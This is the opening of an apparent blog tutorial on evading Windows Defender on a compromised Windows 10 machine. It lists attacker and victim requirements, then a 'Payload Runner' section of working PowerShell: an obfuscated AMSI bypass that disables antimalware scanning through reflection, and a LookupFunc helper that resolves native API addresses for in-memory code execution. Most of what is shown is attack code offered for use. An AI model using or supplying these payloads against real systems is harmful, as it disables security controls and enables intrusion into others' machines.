Bypass Windows Defender

Cristian Cornea
6 min read · Jul 28, 2022

In this article, we will bypass Windows Defender (the latest version), explaining each step in detail.

Requirements

  • Windows 10 machine (Victim)
  • Low-level privilege account compromised on Victim
  • Linux machine (Attacker)
  • Defender Anti-Virus running & up-to-date at the moment of publishing this article

Payloads Used

  • Payload Runner:

    # Reflection over the AMSI helper type; the strings 'AmsiUtils' and 'amsiInitFailed'
    # are split with [char] concatenation to avoid simple string matching.
    [Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)

    # Resolve the address of an exported function through the internal
    # Microsoft.Win32.UnsafeNativeMethods wrappers in System.dll.
    function LookupFunc {
        Param ($moduleName, $functionName)
        $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
            Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
        ).GetType('Microsoft.Win32.UnsafeNativeMethods')
        $tmp = @()
        $assem.GetMethods() | ForEach-Object { If ($_.Name -eq "GetProcAddress") { $tmp += $_ } }
        return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
    }
